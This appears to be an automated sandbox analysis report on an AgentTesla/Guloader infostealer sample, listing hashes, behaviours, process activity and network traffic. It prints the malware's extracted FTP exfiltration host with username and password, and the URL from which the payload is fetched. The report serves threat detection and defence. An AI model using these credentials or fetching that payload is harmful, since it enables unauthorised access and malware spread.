Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    10/12/2024, 03:32 UTC

General

  • Target

    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe

  • Size

    999KB

  • MD5

    5c45c0877fb82d10594fde27ceef591d

  • SHA1

    ea68349b2af800d39680cf50da9e3284ec1d52a4

  • SHA256

    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052

  • SHA512

    d6497d61d8bbf155223fe4554783b0e86ab326ffb20bbbac4b444e0d27f16715458bf055085732c4204cbccba84419de62bd75615602a291e26c1dbc74a6bda9

  • SSDEEP

    24576:+YB//x9siaesoieYuVffHku3WggclxxIJzsGOB:j9//FAUHffHkumggclxGZW

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.rusticpensiune.ro
  • Port:
    21
  • Username:
    AdminFTP@rusticpensiune.ro
  • Password:
    hr,d@KUwa5llI%*RNL^J]g%8I;!;_Ne#G1h~lE!*86DAAD6#iLm$x)r+e1z$p+_Q,4_(f!};B?vD!IG?NqT[zOHNr6_nww[S]V?MlcYSt_QO

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in Visual Basic.

  • Agenttesla family
  • Guloader family
  • Guloader, Cloudeye

    A shellcode-based downloader first seen in 2020.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk, where infostealers often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials and similar secrets.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    "C:\Users\Admin\AppData\Local\Temp\b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:2524
    • C:\Users\Admin\AppData\Local\Temp\b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
      "C:\Users\Admin\AppData\Local\Temp\b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe"
      2⤵
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1388

Network

  • flag-us
    DNS
    241.150.49.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.150.49.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    88.210.23.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    88.210.23.2.in-addr.arpa
    IN PTR
    Response
    88.210.23.2.in-addr.arpa
    IN PTR
    a2-23-210-88.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    22.160.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    22.160.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    www.corella.ro
    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    Remote address:
    8.8.8.8:53
    Request
    www.corella.ro
    IN A
    Response
    www.corella.ro
    IN CNAME
    corella.ro
    corella.ro
    IN A
    109.73.128.91
  • flag-ro
    GET
    https://www.corella.ro/imges-drive-content/xClBgxfB133.bin
    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    Remote address:
    109.73.128.91:443
    Request
    GET /imges-drive-content/xClBgxfB133.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Host: www.corella.ro
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Tue, 10 Dec 2024 03:32:25 GMT
    Server: Apache
    Last-Modified: Mon, 09 Dec 2024 05:41:04 GMT
    Accept-Ranges: bytes
    Content-Length: 241216
    Content-Type: application/octet-stream
  • flag-us
    DNS
    91.128.73.109.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    91.128.73.109.in-addr.arpa
    IN PTR
    Response
    91.128.73.109.in-addr.arpa
    IN PTR
    server1djembaro
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168.deploy.static.akamaitechnologies.com
  • flag-us
    DNS
    209.205.72.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    209.205.72.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    200.163.202.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    200.163.202.172.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.31.95.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.31.95.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    180.129.81.91.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    180.129.81.91.in-addr.arpa
    IN PTR
    Response
  • 109.73.128.91:443
    https://www.corella.ro/imges-drive-content/xClBgxfB133.bin
    tls, http
    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    9.3kB
    253.6kB
    192
    187

    HTTP Request

    GET https://www.corella.ro/imges-drive-content/xClBgxfB133.bin

    HTTP Response

    200
  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    88.210.23.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    88.210.23.2.in-addr.arpa

  • 8.8.8.8:53
    22.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
    144 B
    1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    www.corella.ro
    dns
    b7e96f5e7dc899dc84e8eb7d63c867f38e8b742c2e44680dba593969ff148052.exe
    60 B
    90 B
    1
    1

    DNS Request

    www.corella.ro

    DNS Response

    109.73.128.91

  • 8.8.8.8:53
    91.128.73.109.in-addr.arpa
    dns
    72 B
    103 B
    1
    1

    DNS Request

    91.128.73.109.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    73 B
    139 B
    1
    1

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    209.205.72.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    209.205.72.20.in-addr.arpa

  • 8.8.8.8:53
    200.163.202.172.in-addr.arpa
    dns
    74 B
    160 B
    1
    1

    DNS Request

    200.163.202.172.in-addr.arpa

  • 8.8.8.8:53
    18.31.95.13.in-addr.arpa
    dns
    70 B
    144 B
    1
    1

    DNS Request

    18.31.95.13.in-addr.arpa

  • 8.8.8.8:53
    180.129.81.91.in-addr.arpa
    dns
    72 B
    147 B
    1
    1

    DNS Request

    180.129.81.91.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\nsd763B.tmp\System.dll

    Filesize

    12KB

    MD5

    cff85c549d536f651d4fb8387f1976f2

    SHA1

    d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e

    SHA256

    8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8

    SHA512

    531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88

  • memory/1388-22-0x0000000037240000-0x00000000372A6000-memory.dmp

    Filesize

    408KB

  • memory/1388-15-0x00000000016F0000-0x0000000004622000-memory.dmp

    Filesize

    47.2MB

  • memory/1388-19-0x0000000000490000-0x00000000016E4000-memory.dmp

    Filesize

    18.3MB

  • memory/1388-20-0x0000000000490000-0x00000000004D2000-memory.dmp

    Filesize

    264KB

  • memory/1388-21-0x00000000374F0000-0x0000000037A94000-memory.dmp

    Filesize

    5.6MB

  • memory/1388-24-0x0000000037DE0000-0x0000000037E30000-memory.dmp

    Filesize

    320KB

  • memory/1388-25-0x0000000037E30000-0x0000000037EC2000-memory.dmp

    Filesize

    584KB

  • memory/1388-26-0x0000000037F20000-0x0000000037F2A000-memory.dmp

    Filesize

    40KB

  • memory/1388-27-0x00000000016F0000-0x0000000004622000-memory.dmp

    Filesize

    47.2MB

  • memory/2524-12-0x00000000771E1000-0x0000000077301000-memory.dmp

    Filesize

    1.1MB

  • memory/2524-13-0x0000000073ED5000-0x0000000073ED6000-memory.dmp

    Filesize

    4KB

  • memory/2524-14-0x00000000032B0000-0x00000000061E2000-memory.dmp

    Filesize

    47.2MB

  • memory/2524-11-0x00000000032B0000-0x00000000061E2000-memory.dmp

    Filesize

    47.2MB
